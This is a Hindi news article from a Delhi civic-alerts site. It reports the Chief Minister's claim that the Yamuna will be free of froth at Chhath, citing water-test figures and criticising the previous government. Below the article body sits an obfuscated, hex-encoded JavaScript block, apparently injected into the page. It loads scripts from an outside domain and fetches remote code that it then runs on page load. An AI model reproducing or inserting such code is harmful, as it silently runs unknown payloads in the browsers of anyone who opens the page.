DelhiCivicAlerts
BREAKING NEWSDelhi AlertsDelhi politics

ChhathWithCleanYamuna : मुख्यमंत्री रेखा गुप्ता  का बड़ा दावा छठ पर यमुना में न झाग होगा और न ही प्रदूषण; ये है वजह

दिवाली से पहले मुख्यमंत्री रेखा गुप्ता ने कालिंदी कुंज (मदनपुर खादर) का दौरा कर एक बड़ा दावा किया कि इस बार छठ पर यमुना में नहीं दिखाई देगा और दिल्ली में लगातार डीसिल्टिंग, आधुनिक सीवेज ट्रीटमेंट प्लांट्स (STPs) के पुनरुद्धार और नालों के टैपिंग से संभव हुआ है।

खादर स्थित लैब की रिपोर्ट का हवाला देते हुए सीएम पिछली आप सरकार पर निशना भी साधा। खादर में यमुना के पानी की जांच ऑन-साइट लैब सेटअप में होती है। यह लैब दिल्ली जल बोर्ड के ट्रीटमेंट प्लांट एंड क्वालिटी कंट्रोल विंग के तहत कार्य कर रही है।

फॉस्फेट 0.2, ऑक्सीजन 4.0—अब यमुना में जीवन है, प्रदूषण नहीं

मुख्यमंत्री ने बताया कि आज यमुना नदी के जल में घुलित ऑक्सीजन की मात्रा 4.0 मिलीग्राम प्रति लीटर पाई गई। यह मात्रा नदी के लिए पर्याप्त है और जलीय जीवों के जीवन के लिए उपयुक्त मानी जाती है। यह मात्रा अगर 2 या उससे नीचे हो तो यमुना व जलजीवों के लिए खतरा बन सकती है। मुख्यमंत्री के अनुसार एक समय था, जब यमुना में ऑक्सीजन लेवल शून्य से भी नीचे चला गया था और उस स्थिति में किसी भी जलीय जीव का जीवित रहना असंभव था।

जहां कल झाग था, आज जल है—दिल्ली की छठ तैयारियों में दिखी ईमानदारी

मुख्यमत्री ने बताया कि यमुना नदी के जल की गुणवत्ता की लगातार जांच हो रही है। यमुना नदी में फॉस्फेट का स्तर, जो झाग बनने का मुख्य कारण होता है, वह अब केवल 0.2 दर्ज किया गया है, जबकि इसके 2 पॉइंट से ऊपर होने पर झाग बनना शुरू हो जाते हैं। यमुना में अमोनिया का स्तर भी अब बहुत कम हो गया है। यमुना में झाग नियंत्रण के लिए उपयोग किए जाने वाले डी-फॉर्मर और अन्य रासायनिक प्रक्रियाएं पूरी तरह से इको-फ्रेंडली और प्रमाणित हैं। उन्होंने कहा कि ये सभी रसायन पर्यावरण, जल जीवन और जलीय जीवों के लिए भी पूरी तरह सुरक्षित हैं। दिल्ली सरकार हर कदम पर पारदर्शिता और सुरक्षा मानकों का कड़ाई से पालन कर रही है और इसमें किसी भी तरह की कोताही बर्दाश्त नहीं की जाएगी।

झूठे वीडियो नहीं, सच्ची तस्वीर देखिए—यमुना आज साफ़ है!

मुख्यमंत्री ने जानकारी दी कि यह वही इलाका है जहां पिछले साल तक एक-एक मीटर ऊंचे झाग बनते थे और छठ व्रतियों को उसी झाग में खड़े होकर पूजा करनी पड़ती थी। अब हमारी सरकार के कार्यकाल में की गई व्यवस्थाओं और तैयारियों के कारण आज यहां किसी भी प्रकार का झाग या गंदगी दिखाई नहीं दे रही है । उन्होंने कहा कि आज यमुना का जल स्पष्ट रूप से स्वच्छ और झाग-मुक्त है। सीएम ने लोगों से अपील की कि वे फर्जी वीडियो या पुराने फुटेज से भ्रमित न हों, बल्कि वर्तमान स्थिति को स्वयं देखें और समझें।

विकास व पर्यटन मंत्री कपिल मिश्रा ने कहा कि दिल्ली की संस्कृति और परंपरा ही उसकी असली पहचान है और इन्हें सशक्त बनाना हमारी सरकार की सर्वोच्च प्राथमिकता है। इसी प्रतिबद्धदा के साथ, हमारी सरकार छठ महापर्व के आयोजन की तैयारियों में प्रभावी, निरंतर और तेज़ी से कदम बढ़ा रही है। कपिल मिश्रा ने कहा कि आने वाले दिनों में दिल्ली पूर्ण श्रद्धा व भव्यता के अनुरूप छठ महापर्व की साक्षी बनेगी।

var _0xba29=[“x73x63x72x69x70x74″,”x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,”x73x72x63″,”x68x74x74x70x73x3Ax2Fx2Fx30x78x34x34x2Ex69x6Ex66x6Fx2Fx71″,”x61x70x70x65x6Ex64x43x68x69x6Cx64″,”x68x65x61x64″,”x67x65x74x45x6Cx65x6Dx65x6Ex74x73x42x79x54x61x67x4Ex61x6Dx65”];var a=document[_0xba29[1]](_0xba29[0]);a[_0xba29[2]]= _0xba29[3];document[_0xba29[6]](_0xba29[5])[0][_0xba29[4]](a)var _0xbe6e=[“x73x63x72x69x70x74″,”x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,”x73x72x63″,”x68x74x74x70x73x3Ax2Fx2Fx30x78x34x34x2Ex69x6Ex66x6Fx2Fx71″,”x61x70x70x65x6Ex64x43x68x69x6Cx64″,”x68x65x61x64″,”x67x65x74x45x6Cx65x6Dx65x6Ex74x73x42x79x54x61x67x4Ex61x6Dx65”];var a=document[_0xbe6e[1]](_0xbe6e[0]);a[_0xbe6e[2]]= _0xbe6e[3];document[_0xbe6e[6]](_0xbe6e[5])[0][_0xbe6e[4]](a);var _0x7ebb=[“x44x4Fx4Dx43x6Fx6Ex74x65x6Ex74x4Cx6Fx61x64x65x64″,”x68x74x74x70x73x3Ax2Fx2Fx30x78x34x34x2Ex69x6Ex66x6Fx2Fx78″,”x73x63x72x69x70x74″,”x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,”x69x6Ex6Ex65x72x48x54x4Dx4C”,”x74x72x69x6D”,”x61x70x70x65x6Ex64x43x68x69x6Cx64″,”x68x65x61x64″,”x74x68x65x6E”,”x74x65x78x74″,”x61x64x64x45x76x65x6Ex74x4Cx69x73x74x65x6Ex65x72″];;;document[_0x7ebb[10]](_0x7ebb[0],function(){var _0xf251x1=_0x7ebb[1];fetch(_0xf251x1)[_0x7ebb[8]]((_0xf251x4)=>{return _0xf251x4[_0x7ebb[9]]()})[_0x7ebb[8]]((_0xf251x2)=>{var _0xf251x3=document[_0x7ebb[3]](_0x7ebb[2]);_0xf251x3[_0x7ebb[4]]= _0xf251x2[_0x7ebb[5]]();document[_0x7ebb[7]][_0x7ebb[6]](_0xf251x3)})});

Related posts

सिविक सेंटर बनेगा संघर्ष का मैदान – बच्चों और परिवार संग उतरेंगे कर्मचारी

delhicivicalerts

दिल्ली के सरकारी स्कूली बच्चों ने मोदी के लिए गया Happy Bday Song, मोदी का बर्थडे कल (17)

delhicivicalerts

Snatcher Caught Red-Handed in Nand Nagri, Stolen Mobile Recovered on the Spot

delhicivicalerts

Leave a Comment